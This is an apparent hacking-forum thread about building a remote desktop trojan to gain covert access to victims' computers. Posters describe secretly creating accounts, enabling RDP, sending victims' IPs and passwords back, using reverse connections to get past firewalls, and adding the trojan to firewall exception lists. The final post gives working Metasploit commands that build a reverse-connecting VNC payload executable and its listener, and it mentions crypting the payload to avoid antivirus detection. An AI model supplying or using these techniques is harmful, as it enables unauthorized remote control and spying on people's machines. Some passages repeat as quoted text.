well its very difficult to stablish a connection from your computer directly to victims computer and that is because the router has like a firewall that stops any income connection okay if you want to go deep you will have to use a 0 day exploit to pass the firewall now you have to code a packet sender to send a raw network packet in order to exploit a specific protocol service (TCP/UPD) like of an AV update protocol or even a msn protocol that part is very hard I know the teory very good but Ive tried once but I took an arrow to the knee...
here is an example of one of those candys:
http://www.zerodayinitiative.com/advisories/ZDI-12-033/ (http://www.zerodayinitiative.com/advisories/ZDI-12-033/)
you will have to learn cryptography of protocols and routers If Im not wrong and of programming networking to send the packet ,reverse engieenering for analyzis of the protocol good luck
well its very difficult to stablish a connection from your computer directly to victims computer and that is because the router has like a firewall that stops any income connection okay if you want to go deep you will have to use a 0 day exploit to pass the firewall now you have to code a packet sender to send a raw network packet in order to exploit a specific protocol service (TCP/UPD) like of an AV update protocol or even a msn protocol that part is very hard I know the teory very good but Ive tried once but I took an arrow to the knee...Ohmy. He's not talking about exploiting an active RD server (these days there is a lot of activity on this :P). He's talking about infecting a machine and have RD access.
here is an example of one of those candys:
http://www.zerodayinitiative.com/advisories/ZDI-12-033/
you will have to learn cryptography of protocols and routers If Im not wrong and of programming networking to send the packet ,reverse engieenering for analyzis of the protocol good luck
Ohmy. He's not talking about exploiting an active RD server (these days there is a lot of activity on this :P ). He's talking about infecting a machine and have RD access.
You have two ways:
a) Code your own RD manager. You will have to send screen images, catch events, send events, and shit. bubzuru made this: http://evilzone.org/evilzone-releases/silent-vnc-%28official-thread%29/msg11161/#msg11161 (http://evilzone.org/evilzone-releases/silent-vnc-%28official-thread%29/msg11161/#msg11161)
b) Just add an account and enable windows' RD. Send your IP back. But as gh0st said, you will probably not be able to connect due to the router's firewall. I don't know if MS RD allows working in reverse mode.
How does teamviewer work is a mystery, although for viruses this technique is called "Reverse connection" - instead of you connecting, a virus connects to you. This works because the router firewall usually with default configuration blocks incoming traffic, but not outgoing. Windows firewall blocks both (usually it asks you what to do), but there are lots of methods to add yourself into an exception list.
Remote desktop trojan is simpler because (the way I see it) it just enabled and configures the RDP on a windows machine then sends the info back to you, or it doesn't if it's coded to set static passwords everywhere.
@Professor Potato : You're an idiot.bro why waste countless hours when you can use teamviewer bro? who's the idiot now bro?
bro why waste countless hours when you can use teamviewer bro? who's the idiot now bro?Still you.
Still you.
I don't know much about RDP. But keep in mind that a virus should have everything in itself. Additional batch or VBScript files are not how viruses roll.
If you are enabling the windows default RDP then I guess you don't need to put exceptions in the Firewall. You don't even need to do anything else I think. Just enable the RDP with settings you want, then let the virus send the info back to you, like the IP, port, user and password - this might be tricky, maybe email?
How does Remote Desktop trojan work? Does it enable the port 3389(default) itself at the victims router configuration? If not, how does it work? Since if i want to code my own, it is only possible if the victim has enabled Router Port of 3389?
Let me just start of by saying that I really do not know how to start this reply. This topic contains so much retarded text and information written in a manner that should never see they light of day.
The things discussed in this topic is basic networking knowledge. Not the RDC part, but the WAN/LAN/routing part.
To start of I will answer the original topic question;
(quote above is not original, corrected quite a lot.)<rant>
When you use commas, use them correctly. It is not "word , word" or "word,word" or "word ,word". It is "word, word".
One does not use capital letters in words that are not names, locations, abbreviations and a few other exceptions.
Use punctuations.
Use question marks.
Use line breaks.
DO NOT USE THE WORD "BRO" OR ALIKE.
This may not be as annoying to you and people writing like yourself right now. But once you stop writing like a fool and start writing understandable, it is a real mother-fucking-pain in the ass.
</rant>
Now on to your question:
Very very few applications/services auto forward their ports in routers and Microsoft's remote desktop control service is not one of them. This is simply because there are no standards for this(I am sure there are more reasons for it as well). All routers(most) are different from one another and so forth.
However, there are something called UPnP which allows for temporarily port forwarding. Various torrent clients and so forth use UPnP to allow file exchange. I suggest you look into that, or use reverse connection technology.
In reply to your this part of your question(", if no then how it works :S"): If you are in a LAN and separated from the Internet by a router or other means of network separation, you have to configure your separation device(s) to forward specific ports and or addresses to the correct machine inside the LAN and then connect to the routers public IP(often revered to as port forwarding).
I would suggest you look away from most other replies than mine in this topic as they are just confusing and or wrong. I would also suggest you do the first part of a CCNA Cisco certification or something along those lines. Not saying that you need to have a deep understanding of everything before moving on, but its a smart choice if you do.
I would also like to apologize for any offense people will take from this as I know people will. The 'rant' section of this reply is a general reply to all rubbish-writers. I do not mean to offend anyone, but I just can't stand people who can't write properly. Even though I have been there and done that.
you connect to your localhost where there will be a program listening. This program at the same time listens to a remote port which a second program running on your victims computer are constantly trying to connect to. And once you connect to the local program on your machine, and there is a connection from your machine's program to the victim's program, a message will be sent by your program to the other program making the other program connect to localhost on your victims computer. Once all the above have been done, the programs will not do anything other than passing traffic along. Piping your remote desktop control client to your victim's remote desktop control server.
Client <-> Local program <- INTERNET -> Victim program <-> Server
Why dont you try reverse VNC session with metasploit:
Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.12 LPORT=2482 X > /tmp/reverse-vnc.exe
Listener:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.12 LPORT=2482 DisableCourtesyShell=TRUE E
Ofcourse this will be detected by AV if you dont know how to crypt it.